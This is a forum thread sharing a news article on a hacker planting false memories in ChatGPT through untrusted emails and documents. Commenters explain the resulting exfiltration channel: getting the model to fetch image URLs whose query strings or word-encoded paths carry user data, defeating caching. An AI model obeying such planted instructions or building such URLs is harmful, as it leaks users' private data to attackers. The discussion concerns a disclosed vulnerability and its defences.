Technology @lemmy.world captainkangaroo @discuss.tchncs.de 2mo ago

Hacker plants false memories in ChatGPT to steal user data in perpetuity

arstechnica.com Hacker plants false memories in ChatGPT to steal user data in perpetuity

Emails, documents, and other untrusted content can plant malicious memories.

Technik @feddit.org effzehkoelle @feddit.org 2mo ago

arstechnica.com /security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/

You're viewing a single thread.

27 comments

How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?
- Haven't read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
  
  Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
  
  This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?
  
  IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
  
  This wouldn't help, would it? How would you prefetch and cache:
  
  site.com/base64u-to-niceware-word-array/image.gif
  
  ? It would look like a normal image URL in any article, but actually represent data.
  
  Note: "niceware" is a way to convert binary or text data into a set of words like "cow-heart-running-something-etc".
  
  If it’s prefetched, it doesn’t matter that you reveal that it’s been “opened,” as that doesn’t reveal anything about the recipient’s behavior, other than that the email was processed by the email server.
  
  If by prefetch you mean the server grabs the images ahead of time vs the client, this does not happen, at least on amy major modern platform that I know of. They will cache once a client has opened, but unique URLs per recipient are how they track the open rates.
  
  Apple’s Mail Privacy Protection does this. See https://www.reddit.com/r/privacy/comments/pt9ycv/apples_mail_privacy_protection/ for a post from three years ago talking about it.
  
  I don’t know if any other major providers take this approach but Apple / iCloud is definitely one of them.
  
  But the path changes with every new data element. It's never the same, so every "prefetch" is a whole new image in the system's eyes.
  
  Even with a unique link, if the behavior is that as soon as the email server receives it, it’s prefetched, what does that reveal about the user?
  
  Server or client, every supposed prefetch would be unique. If I trick an LLM client into grabbing:
  
  site.com/random-words-of-data/image.gif
  
  Then:
  
  site.com/more-random-data/image.gif
  
  Those are two separate images to the cache engine. As the data refreshes, the URL changes, forcing a new grab each time.
  
  For email, marketers do this by using a unique image URL for every recipient.
  
  Cool, all of your images are getting fetched by the server as it receives and processes the emails. You have 100% open rate on all emails to that domain within 3 minutes of send.
  
  What do you know about the user and their behavior? Nothing. The prefetch is not tied to their actions, therefore you cannot learn anything about their actions.
  
  This post isn't about email open rates, it's about data exfiltration. But for email speficially, show me major providers that prefetch by default.

27 comments